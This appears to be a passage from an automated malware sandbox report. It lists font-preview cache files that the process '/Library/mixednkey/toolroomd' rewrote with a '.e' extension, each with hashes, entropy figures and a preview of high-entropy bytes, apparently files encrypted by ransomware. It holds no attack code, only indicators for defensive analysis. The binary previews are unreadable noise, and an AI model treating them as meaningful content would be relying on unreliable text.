,.'.!.:.RCE...<yY.1...f2..4.y0......6<...z.._....T....t.V..gH.......<6.mY.G$.+L.Y.[....r.3.@.P....g......)]..J.9....4..o4.D...u]....y01.6...Z;.6..........j.>.\.h....0....u!....Y......m..?d.w.H.y..Br..5N..I.r{.>MI9....L..v.x.G..P..Pm

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Malayalam Sangam MNRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1914
Entropy (8bit):	7.631076842033326
Encrypted:	false
SSDEEP:	48:E3dYRDPlHZL+rYBjafeQ9PGFzr7aG1RolsgFGLI6LNpq:iKBPlHcfAjkl/GLIqu
MD5:	B5834651A986F42A06C287CA90534EBB
SHA1:	D10308354EB517BF9A563DF107130874A5C9607B
SHA-256:	4C266E82C3A4BE7350AF274A23B2493070E0D18DDCAE90B5D32A06FC83FF6CAB
SHA-512:	E3F6BB42A4C19B6BE07CE6B8AC854FAE068DA146A58D578F714F93A54349B981FE31512E08115ACE2277506B1A31ACF1E532C1DFFD79DBE3DB9CF2A2B666C379
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.[...0=...n..Myh..!]s."L...M.X....I..9.".,..e.%SS.....cu~..H....c'../.z....4..;.7..-.m....eK.&..g..B;.eOy7v....7.....V!.....V!..x\....r.?(+..!.g.2.."....O...8<.M.>#........m1o...t.C.{...t.:n.;...)i!3.~.\.E....v.....T......N.l...A....a...k......Z..\|.sO.p..s..3t...s....B...>...V..l...A.A=..}..RG.....QX.X......[.Q...0.`B.I...l.y.d;`vI/..jqMU...w.;.JVY..l..<.D..W-..5..W.+.{.....:.=Z.].@V.b.vM.......uF..+yk..b....{DWl.S,2.>~es..;q.pG.k...J.m.....UR..1.d...V;g.QQa./...L......G.>......[J..5....F..2).J....n......s7.V6bb0...}..jN.dUz......V~....o'(..PO.^q.}..2...y%.....-'...6...A.....7.)....^..afqa.\4H.\|...t.....$...'.].(...n8.......g..j.n.9...D..<).nI..D..7[.....Hr%.5._...@.8.\|A.p.+.<m.R.L..WM.n0.......V8):.E.F.)r....H.....VV{.....%ka..)..J.EUZ.*"7,..........6+T.X&.ORx.f=...s..T.1.?.I......Vz.B.......'.0$$yF.$.M.VI.qx..!.$.........0....<d..&.aa..8.%/...\|.g.5:.......=..B.$......>T.b..3...........

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Malgun GothicRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1722
Entropy (8bit):	7.602464637051783
Encrypted:	false
SSDEEP:	24:Ehw7WxFBTAJEY4qTXWgEND0T04yazjkZ28AhuI1ItQlUl+AKbsePc0m7:Eh7rTbY4yXDENoo4y1Z2jhPddAYNpq
MD5:	A361D1DAB2D913FCE02741876433322A
SHA1:	68B53530F3ACBC81892A5A83FD8B63C26BAD45BF
SHA-256:	C2DAC3A324C0871B79F1D0A5B32195FA6A444050AD2B2944F299251F5106DE9D
SHA-512:	11472B82DD0BD304DD93B68C6097FECCE5899BC1048A2210DA22AA2F2407B814E1BBE2181A22D852C887D0C1C21EBFA94EAA3C2954DAC2B89A131B03D5CA2F07
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a ...f\|S..9qz.Ri...".a...J...._9m.F.I.D.Z...x0....N.^K...'..0kd..:.......;...Z.k.1..+5........K...L2.Ag.l(o..I...m.....U.@.I....%....n8,Q6r......]..]Q..5.^......].X......~p....OO6#....ke.bYt}g.....q;.h]^..q..+...'.D..B.:....qu..Ia..{.....M..$.Q.G.I?.....#.j.M\|.$............:3.8.W.../....2......1......$.......ufI(.&.Y..L./..q8.}T4..V..?N9Z.U!1....3..?]..p...n..e..j..@...'..6.5...#.<.........L..v....:y'....OLFe:1t....\..h...iu.Z..QZK..}../..s.Y>....b.N7.ZnEf..8..Ka...((...L..=.Zg.7.wKf........<...W...T8.+x...!R1....e.).q...#j....T.?...e.....a.2k..c.1.^..3..\..\S........Z=.O.........v.4......$.k...8B..e..#.Q.....^.....mUtx....;.M..2...5@.eK...q.P.sx}in......D...?.j.)%.....).6y.9.7.A....4.....f...X...u...N...9...8c.>..0..4.....o.N.H.Fe...&wk.....a"@Qr...7\|a....V.`.;?&_]g;....9{.m......X. A7...r.Lr!.0.....I.t...U....oz.(sLY.<T........K.j.:A.....d...b..4Oy..Y.>Iw:..S.O..zr$.Gn;jw... jw.;H~..2:

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MangalRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1218
Entropy (8bit):	7.348025519725711
Encrypted:	false
SSDEEP:	24:vFosuHu0EM2ndGfSc4al7LOMu9mgCSY07PUbl0Q6wzYYM1sePc0m7:vysGnh4+W9aSJrGl0Q6kYYWNpq
MD5:	4062C38E18C98B341FA3D52EFF15D695
SHA1:	5B79BF684C32A5156DDFC494746A3C730705E425
SHA-256:	17DAE5EA241DA69EAED498A07F90589DED3951496DA74158A0BB02DFDE8B99A2
SHA-512:	E15A875482C2B8955BAD8439F963B8B419C92D84764860A5AB92293F01A41A04632124FA1BE3C3E1AF6BC8720422152018D3F3310A027454810F5ADB9F126B69
Malicious:	false
Preview:	.<.\|.....f.A..s)F.2....V.....>+..Gx,.i .Y.a?../....2I....b\..@/0..\|.A....9....pY.7.Wej.q...V.....U2U^.q'....."..hh.T..'vZN.....}!N7...Jz....i..............Z...R.n.C..H....bWpO:..\`..F....V.y..Z.......+t\wT....2..........V...h..w=.4&g..........Vt..<wj..^...0..........G...v...#@..iM..>.A."h.X.mZt.3...f.2x.bD:....._2.?..=.#..."D:.(...eFk<....N2...P3+.......s..W....q.\hV....T....~.X....,.4N..R.....Y..Cjt..G.N{...q....Z..y..\|?I5.n.98..v.t=.-PB....:.2.`.c.D.R.._..#.p.G.{a..G..r0I].s.nz.^...UM....1q.....['._.Bt.[.....$_rs6".U...HX6.k..:B.....T....~.C..X.k.......m/.b.v.-.-...._..E.H..a..A.kUS.U.....xu.A...L...k....^...Y...w8.q..8A.r1/4..L...<7U@..q..!.fA.#..'(=..RW{....{...j(..I..>........+....."..oD....t.x...}.{......\.A=.....Bu.kx.. v.....//5-$.v..m..cR.?x<.....S.m4.T.00......[.<"...lT.q).8...acr.....S..y..@..../6.........k#D3...C-.!-G.....U..u....h8.W...................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MarionRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1186
Entropy (8bit):	7.340458682536956
Encrypted:	false
SSDEEP:	24:ExHlxUiGS53hrkQvDv5P8j5LF3ok37yIx/MsePc0m7:EXxWy3pRcL1ok37yI9MNpq
MD5:	73B3A63F47238604B24D1A5FD290A019
SHA1:	0857C71A4685A5A0F12F77C45D356DD83DECE612
SHA-256:	3430DC81D0E0F3C9C461779B365105A8CF18D015DB2F056CFAC089BBCC30FBE4
SHA-512:	5FBEA845521DC95381F39440201546903B77F7584B8415EA3656370D58CF652399B6E3967E4BE39CC440F2A699C5258FAA321FA1F8F73FC1EA1A56BF1277AA18
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.D..BL!.K.t.5.._p-.u.......R..K..,z..Ioh7T.....4.h....?3D..Z...K.)`..V,.c.{$.3.....B(l..<....v...?Quw..f...@..i.#Y'za.(V..p.B[.zY9.1/.7.z[...H-.x^J..Id'..-.2yW<n8.;...AiPH...[qt.h7..37.v.u.m._-...B.,..P3.?n..l....=!.~'....P...-.@k..4........e.....U..C......._...u.r^.....M.^...{t.DJ....{4P.u.'..NI....V"....9%...aPyy...k.S.`.qcCy."wV.-.c!k....ZTS.r8..{.?n..+..K..N.jb...hG2..k.l8..!j....e.9...\...p..k....l....{..g...L}.f.R.....i...4L.I..5ey..b=.Z..Z...j`.%.:...^Y.)..}y7.....=...G.\|,....\|..?L..1.9S:....}p.t.'zR6.....0..G....k..=.....s.;\..l.[.Rb.h.....I..6...>..(..2V.......Y.U.x{._.......)...R].C`...8..........g>.r..M..&IFh...h.......DM.c{...<l...!+(.:@....@....#.Mp.X....V..I...QL..].I..>..q'.KV.,.J....D$A...J..B........\......e..6..c%.C......]o3.N...J.\-..kfnj:q.q.................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Marker FeltThin.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1370
Entropy (8bit):	7.434041326720474
Encrypted:	false
SSDEEP:	24:E/Z/vVpoQg3+y/nt1dunGA4/JPOTSSxNnPZVcbk2jrieBB6pNqpk+sePc0m7:ExVp1It1dunGA4BPOTl3kVvBopNn+Npq
MD5:	FDEB3BCB5BEC8F06B8501D04BD23FEB8
SHA1:	7F60357DAC0E918377D92B759E331ADC157AD8E0
SHA-256:	B36AA5BFE2CA9E2687909C4FD82E9E49049BCB815826A74DC0B99246C7361BA9
SHA-512:	F8EF6C2F6CF6DFBEB76B40795E05D99581773A5B87A17AA241EDA9140C6E12259DFA3EA1CD630294F841F9F21F33D2C173911119B219CC06042BE1A41E3A7824
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..kl...!Rrc>X.^.U@..5c2q>......O..x.U:9.....D..W.."f2.7,..W......:..N..=....T...G..T$.[.lH......3..........%..<....qP.#........h.....On..s.P:.T.B.X.&.~...$...qaEa.)Z.7$.......s!...N,..z.......K....;........#..QY.4.ly...9...+.:..l.o....l.pq{{%.....u.4...N..5y..el..l..`......p{c..E......K.#<.h....0...h..GFeD%jN.s.~......]^O...B=J.b...e.c..)t......ftXm.......j.h.n`.:.z?+%.}.l.9@.:W1.N..d.9...S.e.v;A.....1..=.-....[.~3...~[.... ..VZ..b.^..=.H.{.?.............v....9%.\3....!.UG)2o....nB.~.b.,..};..$..r.1..c.l..E...X.. ..>.3...zJ....S3...I.E..q.\.......9.:x.....x..L.T.....Tn.+^..d..Dl..7\|Q..#. .7..m.W..;..../..Z4d...b'.}....b...t...A..........b@......>za.^+...c!..L...`.:..I.$2....my.K..@.J...`...DM.6[...2..;..J....x..`W.;.>.]........\..t..(..g2N..x.a.lc.Z.p'...........'.S.9...u.jc.41...q......bqX.}...oM..t.S.#.V.a...Q..R.#E..C...z..p.7........Bs.B.xa%[.^..E{.nu..I..%."K.Nd.6..F.U.V.m...5.;.........

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Meiryo UIRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	7.433729949451717
Encrypted:	false
SSDEEP:	24:ExVA+G5CnrFDFiDOZKlit+NM/YLRtIkeOsePc0m7:EHA+HnrFpiKZKsCM/pkRNpq
MD5:	C05707507E267C8764ECD2BEED6CC42B
SHA1:	F71A09211471EC730C8C1297D5A2D077525EA1F5
SHA-256:	3400BB8A01774778013F7E547D3EB4F417F62A2F968D210AF4531BD8292B0599
SHA-512:	754B0E7DF92FE1BE52516A7605516737834D75783DC5EF41286828F0AB508FAB04B9B04FED21F4F6CD122BC789676BC2CB9068832CED7488B5277447A2B4C0CD
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.v......~l.......-?.!........"...W.$6.cn1v.6~..u....D...[.[(p.Fh;.F}..uxK.l.Kc..(h..#-~.H....q.....S.@..yj.+..{k.Z.........>...!..~.:+0]I.M-....Q...[.D..."F.a... Yp..3ef.H..o.]:4f-...>.9.M3.G..ZR8d.V.....\|.k~D.^.G..............r#..".g3..`%f....Y2; 3.........T0..R-j.."\|..f.(....}..!..z.Yw...+..........r.5.L....E.7......,"...T.G.P.........F...4;.G.m._.rb..`.K..8...g...J...SnA..:......#.SG........j........:.>h.3.7....0Q..T5.{~4."..FE..;..6.L....N!.U.zd......^./..7"0...K7.in.f..,.Lr....+.Q.`P$.u.().\|....[..).7..(h.........l..;..S..s."<j..q. .-.R...y)..w.N).R.....1)...y..fZ..T..U.N&...6,/..6..4..Z.nz....~\|k{...!..k..F.~E.E...9....U.$.]).....s%+.b)m.......y'.Wo.u..vY.U.ST.....kr]UO....5............P3e..P ........T.....2Q(m.#.w>.8b...o.N..Kw@t=..&.m.T.D..5.......*n.I....y.]......\|..HM..[(@e...!\|_N....]z&....'..4V..}...5J.-...ipM......[..........:\.0v........X.)..T...;..M...C...D

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MeiryoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1170
Entropy (8bit):	7.297240367073387
Encrypted:	false
SSDEEP:	24:9ApLRsfwX4KZTu3tv05ok7kG54Vk0bRouzjsGsePc0m7:9+yMv14tv05nIbRou0GNpq
MD5:	80B66DCB0AF62D94C4D68B66C6A9E5B4
SHA1:	EFAE718C82ADF65763FD457CCA86E648A8E3A13D
SHA-256:	F69012F2C64750FD9FC2D4744EDF61A14BAE161F474C018B19E8E7107969BB99
SHA-512:	403DC23A080717D701D1B0DE033369E1FA0F9A669EF5923328433E924AC90F4E09833DE61165DBBD7FB80615B427F59CD041102E3D7CAC24F754C38A88908340
Malicious:	false
Preview:	.<.\|.....f.A..}.r<.9.%...D.fu.;..bcZ..i .Y.ah..BM.....U.'P\1..x.../...1..a..vE5....,F\.L......9....;..%...T7..(Q7K/.3(X\|......:wxaw6s...m.#n...izBPWy......+W..#.Q.....(E......}7<.\..?G.g......KQ..X.b1.7....MS...f..+.\1..j.8...gIObs<...bH.........F.wL..i0...:C.... ..............1.....].\|n\|.........:9d( ..HNt.,:......1W..#Xl..v....-.....c..u.@....3...5.r .B..]..p..........>.t.+.,..9....r.{..k2.PF....w..&b.}.....p.-.(.q.A.7.2.x....]II~n0'.R...:..........z...YV!]w..X..(...N..........._E.....}..!E.{.g...4........A.......HWl......._..i.i.....^.}..N~.v\|...So.ie.....1..Mf..t.].g.j.'.`._6.7..qD.............YC.q.Q..@..@.C...ni:.R....u.....]......:......f....h3.....E.0.mdl.D...F.....w5R.+I.E.4.U..tQY:Z....._7.&H...s..A<.3.E.D-V...e0...l?6p./...%g.X#.u.....r2...Rl.z.@`.=Ii....x..{4.p.Osz....J..`...Mk......f,e..T356A^...lL..9...a.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MenloRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1058
Entropy (8bit):	7.235202718000555
Encrypted:	false
SSDEEP:	24:EET7xERFGH79aM5oARso3iC/Sv1XgMThvE1isePc0m7:EGaFchaMGA6o3iC/YNvzNpq
MD5:	AB5DD193A6ABEDA733264072E00E0C93
SHA1:	D0B9801E17EA911E90BAE2D85E920E24679AC417
SHA-256:	BB04DE886425E375E06BAFE31F144B4E1D2D30FF3610AB53A7D57B5A32576A4D
SHA-512:	61DDAC8A886BDD3476D5F6FEB7816596DBE2362F67706D1C3C6D2ECA5AD5A65EE86F696C50C6F20B580D5B8549720311DCFAD1901F6A8F6717158799E269D591
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aE.~...:m...{.(f..].U#!..N.f:......M.....#%2.v.X.6.b.@.J.a.V....ccx.0..U.....U.N..B.&.W..G..)..(a..#......~#2R-.-5=.W..A...(s._.._.~....L....Y&..V.wR.)0....7..[.......BS...+..QKw..?..O...\|.......r1I.}..6..2E...Y.A...v/._.%[w.....6.t.+@.#.?l.B9.2..nO.S.....y/."....F..Wj...]q.N.l.\|...e-...?h.B..K.P.J..lm......s.0]{E..jo.BB/.YZ....tOC.L$s.h....A.3`."....eL..%..W"%/.n.'M..\..%..N....Z.k.....y3...../......<..k......rc....1..{z....>...ud]..?{..C<]....%.8.[.F.L.pk.>.!A.E....L.......A.g:,...3W$..[..,$vP......k.KZ..F....d\|..).&.o............Z...L../5..................).Yk.xo....Z/..q.h...R;...%.l..\|.v>Ca...,..)z.>..L...Cg.L..I..\|.+g.?%o.?LY..5.K;..#I@.f[.Z7.E\.:.&H...s....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..........................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft HimalayaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2154
Entropy (8bit):	7.690598498624835
Encrypted:	false
SSDEEP:	48:EfIkKsKdMrAf+BWssIj3d/5jMZQN0bCp1JRd6Gl6JNeNpq:SjKd0Afy/j3QK0Wp1JRd6GIJIu
MD5:	31B99BDC3B2E4AD6C578F908881F0BA7
SHA1:	0558604BA920ECAEC0898CACC4554E46C41E9E66
SHA-256:	000D0A647E9EB0491276979F28E3F701E1F238936C042BAD522BA6FBC10F75C3
SHA-512:	98FDCBB5633B7B7250A4E28A47E9AE73D5C03A9E49D09237248A03906D87B11940F0DD104246111D5696ACD11B38CA3E3C0A6876B126A2FB9D5B4216C4EFE060
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a\+x...'g.f..3}...Am.....=.17..cc.[..&..p.K....B...pC.T.Z...;R......,l......O.....J....\...J]..P..Y.....!..6..=....6..=..n..R"....L'd.[.-.pNI..`x.]8.R...e7DQ...-.~f.8..".;e........r..-2k_q.>..a.r.=..cI...6.[...3.{.[.....X.4.P2_;..;?$.0E....o2:.W......N.eH...MT.MOpt.....(...W]..Y.....f..X.;S..x."."g..?...r....=2E8Q.Z...u........ .'.....Xz......9.).9.i......r..LG..n.b.Xy..R.p.Hz..z..0.`..#...$A.MA. ....6O...N..]u".A.$.m?:..{G}..i..h....AD..SpL..../d.o..!.{.2.G.^}..==2........W. ..o../o.4....OA..W.... ..w.....XO.....c.....,.Z6....6tC..Xm. ..R!0..j..(4../...{..4..Cz..n.$..e.d...x.u...1g..Q.......a.....7......r!......xv+q.....:..I.....N.mP(Vu..i..5/.1T.....f.d.%..C..K\./....wDJ..........[.......[..,B.......?ag....'..........P.!.HJd..\0/.p..3.BQ.x$...J..mcF..<X.K..i...v..l....!..s8^..Y[....(g.+......,{V<..U.ahm8_.".E%l.z.._qe.f+kWo$#a=d~.=.\.U..y...:..*.1..B..o.D%...lD..B....=.`y.T..Z.i...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft JhengHeiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1994
Entropy (8bit):	7.665337834189438
Encrypted:	false
SSDEEP:	48:EZlD55qliCIC4PnBPcw/cLHJ0NJ0NCUXyZeNpq:g5oYBC4PnBD/mHJuIDXy0u
MD5:	7CF4E8E6938357D2D9E73264C2BB2BB8
SHA1:	D72B012E7540765D4FAD555FD773AEB968F6667E
SHA-256:	50C75A591D3E443AEFA9E9109C91553DDD080282FBE02D31E10807BF5963F380
SHA-512:	9385D309F97736FC803750352188C9D5381213590724F7C4110C798D9867F8D5536EC99878A693AE30F6827AE2A19B988247E362F973AEB3789D7D2761A0F182
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a?.d........H..`....fhf..&....A......e...G1...F..F.f.fq7.r1..v&'$\i......:.x.H.$$:.].Q$...`^Z.).~.e.................'k...@L.]k...@L.].z.t...r.S.......;s......k...1...7YY.......&.........D..........G..%i.T(eu..y..`.8o......f.T..c......j>....[....y..>GH...e.8z~......rm..C...fS...#..(+..D.G.WX.0....]JA'.._...F.$.,..-...Oy.x{).a...f.....%.<..X.(....r'....6...\|....E.I3.q.y"Vh.NA.E.....m^..#d..1..\|...>.K........M..h].O..^#...}R@......S..5.?.....28..e..;I.[.>1E..(..O..g...v.)"....A.A..Q.&2:...?.Z...2..z....\XL.......).m.V...^..Q>y6...Q.R...F1$.....4..%....j;.H.....a.5.(.1.s...bQL.wG\`..#.\.]..J).........4.f.....s.5.7h..[.&..Ab..{p.=.k..To.......j....F../,...3......l...W.W]m...Eo5}RD+Z+.l..]..^6P9}Z75....8.z..v..m....f.-.`....?.<>....3....].2.N.c.k.. .uY.."Z$.z...j......}9...2N.yX{.n.".h.....Q..E.~...J..8D..\|.n....z..[I...XS7.^6.].(S.._Y...4.0..L..mmoq?.....}.,.....<..........j......

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft Sans SerifRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2186
Entropy (8bit):	7.707441858993629
Encrypted:	false
SSDEEP:	48:ENIFL6LL3Nf+45D5+Pu1GDI9kFFtw+wsNnZmB7Zy+ZqwJ3Npq:vmNfjV5HGEu6LqEzdJ3u
MD5:	5C4E4FAD7A98702812826920206EE0AC
SHA1:	4C31E35DE0BB18131BB93713E0D56E0BD24BCFDF
SHA-256:	9984D3C43E3022E992D3F23AAFB1FD3468D0891C8FDAFB996BEE6D2F3E82FC0D
SHA-512:	5993944B5BFE353FC80E12D2A86E7AD0B98B258C3A17DF9166B5CFA0E66116E890C786394D4E83714F69F4B24D12F6F439DCB5E54F32111D5013ADD7A25C9445
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a..nh..7..8N..6F..?..=. .. .R...4..........3c......-.t....@.+.-]...==AA...90v.x)DZ..&...\|.>..b....q...0...q...0...q...0....".wEY......r...;..s...t\|.9..PP..(....U.:CJ.y..a....4.1.:O... q..]v....."M.zS....(.2 cU\|..[..[/....8...I.C.hz.C.jb.S.".....DBo.[.m).E.......\|....LW..R...;,W..m+C...3..=[....L.6.RX}a..+ ..P8.V..\|.\u.;y..U.j.,.....b....nP.T.H.d<..9l.L6....#.%Q"...k.C!.A.........Z...g.O.h.<].-.01....$.fO...F...x..8.+.=FE%.U1...V....1...9.>.>5....gP.!....T.0..S.....8.._...pxWh/..sK.:..8..+......j...P...p.!f..*...#..=....~.....QI......2......0.\Oj.'...1..k..Q..[QzL..QlN.o.k.....}^5.lQ.tx.k.."~.......3...R....N........[I.Kr.../.c.t."H...G'"G.:I.F>W`\|0{.....f.R.t.....R.~d.......{..o_..n....nA.....)Ji.o.....7.{u.............>.w..X.tD..r..1`.7C......3(F.Rim<x.......n....i......`..-.D .2;.cA.1...x..2..u.......{Km.........l..y..\.Ho.lV\|.....s....K......h...p..&c.7_r+.`\|?.~....C$.s..[..O....i.c

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft YaHeiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1778
Entropy (8bit):	7.615910574097043
Encrypted:	false
SSDEEP:	24:E4DIy7NJDNfW4b2n3BEJ9+7PX0Wim9Oyh317J6bxEKQv22bnGSmEGyRrKd+u0QQK:E4kCZ+4b6af+7PX9OyBJ0x9UDNpq
MD5:	B62D502205DC95E7677234D721B060AC
SHA1:	C0DD1870E7C75FD18EBFC8DCF092675D2C04ED82
SHA-256:	047D8078EDD4BFD7E87E967817DBB6BEA2C6BD1B57A7E9F4A25EDA338BAF7CA2
SHA-512:	7A6624436ABB3A80BBF2D45D66699C4ED7E8F18C9A55A94C26B0EE263CDB40B078FFACCDB3EE3327399DCAE5F29729E4B585C7CE3819CAEFF8C053D4516B0899
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.tTa..2..{.....y.........d<....2...6e...)~..E.H".h1P~8..[.o.N?.N.O.Y<.....{.'g+..L..h....P..I5..]....[..."..M.(.B..i.H.:..i.H.:..PA.!..8.p.b..p6...M.l...MU.4.,4..,A...!.......~Uy....v#MM..2......M..ht..`wg...1.0.[......d.....j.....1l.E.P...k."... M...FLWy..t..4...$.!f..G{...;:p....Z....y?.{....p.s..u....-z(.2,.+.+....&j...e.v..L.... .cE.ps..\|...:..&.1i.Q....O5.E).V.M.).....rRN........_9..Qe..@.M...@..G._L..N...,...;.q.jm...O1..C...lrb...g......70....w'.....<..;.;.>qW.n#.m..`.gna.J$..#...vM.o....+...d.....%.,F6~%0[.w.Xb....c....C.}.S]. ,..4.}..6.:w.,.9..8.1..&..G.........5....o/..r}.....v.......~VtCS..g...q....EY\.......%5G.....-...t.3...&.,..J.U%..v..........3...DO...7...?....E.IW......e.+.....1j..J7.....$.S.t.g.......6....b_r.I.`R8.....p.5..v.....!.0......qm.9._....\|..KIW..-e.TB.!2....'.?f.?.F.A.:)...\|....U....:..t............k..).j.kH.c.N=...F......t....o......7$..R.b..........7s.H...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Microsoft Yi BaitiRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1770
Entropy (8bit):	7.596019538939968
Encrypted:	false
SSDEEP:	48:ExfxYqJkQqpicT7Mv65fF6XVA3CvYwGcNuqNpq:cYqJkFpicT7Mv6pEXVAygwGouqu
MD5:	D2E295B33F7328D45F99275A4889BAB0
SHA1:	636A034DEE459704F472CF892354B69F00673852
SHA-256:	5C84F350B3DCA69DECB2FD0A16263D5A9A6F86F98A7B680A4956488705384FEA
SHA-512:	3FCC69B6CD0034E05C97B2980BA74F798312D89D3AB33295EFF9DA46CC87CBD4A1E12710464E1BE6D195CA5FAC020E70B9DBA83DCB637AF020041A92187C0458
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...$...'.B.o...)....<JT^.....U..a>.M...pd..>{T[Gy.U.6p)........CW..a...:..0."..v.D.....v..W.4......l...[..4(nE..m.(..&....v.&....v.&....v.'.2..-..V./.=.0^..E.Xo...b.I;.%..Mt......d..].t..K.d..v6L..u~r.....\.k....B.^..(..C.ai....V.Wf.+.{kZw....v.\|..m....B.....Fx..T,....h9.Y...H..1..@..Z.@ke.O...a..".?...s\|Ks.%....^....h..O.....e.e...+.$.3.....}..g.........q..qY..G.f....r....FI..<.x.Y?Cm...Al..#.O_..m...x<)p.....'..D4s.k.(..l......).2.t.....5.,U"+3.....z.k....p^..../...RU..Q.Q7.......E...\|a.14T..h}...r\|..0.\..~bu.'....5;.x....C.".......).c...X...o...y.(.....8..Y.~.ru...'...-Z...]..U..5.z..:m..jSv[H(D..En...9..RB.}a....P..n..z5.y@N.w^....<<.......[.a....M...).MR..$.U\|.....4NS..>..i..jy...M....-./\| ...}k...[..?..j.v.9Bh.....xmp.....n.;. ..h.wx...k...4h.y.t....:.......@U\R~M..F.....[.......4.H.^v.X.K......^...>t..Z"...UG.3G.a~.].pk..AA.vPE...z.....).....d..b....*.....T>..I.p......8m..o{.H,G..\O..K.P

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.MingLiU-ExtBRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1730
Entropy (8bit):	7.568786035842593
Encrypted:	false
SSDEEP:	24:EL264SXwGbg6KKOUJ08DyRqoc8jhxP2JfWuaLbbzbjdA6iC823zLt9bNnsePc0m7:EoSAX8ERqofTiflav2C8kzHhnNpq
MD5:	88B5185CFA99B89EF43730DC307DF379
SHA1:	1D2897C591A6B735EE6D6D7A414F727E81797DD1
SHA-256:	7F1E368EACCFC643D6587960E21D9F16F8DEF4B2E1A411D5D9E610F13A344F77
SHA-512:	04A4B9AABA627910F87987778ED6C346C5C6B6C382A495EEC55BE8C0F849E3E4EBE250C194396895BFBE0091B11A7D30EFF0CFDEA833AF52840AF6362A67CE91
Malicious:	false
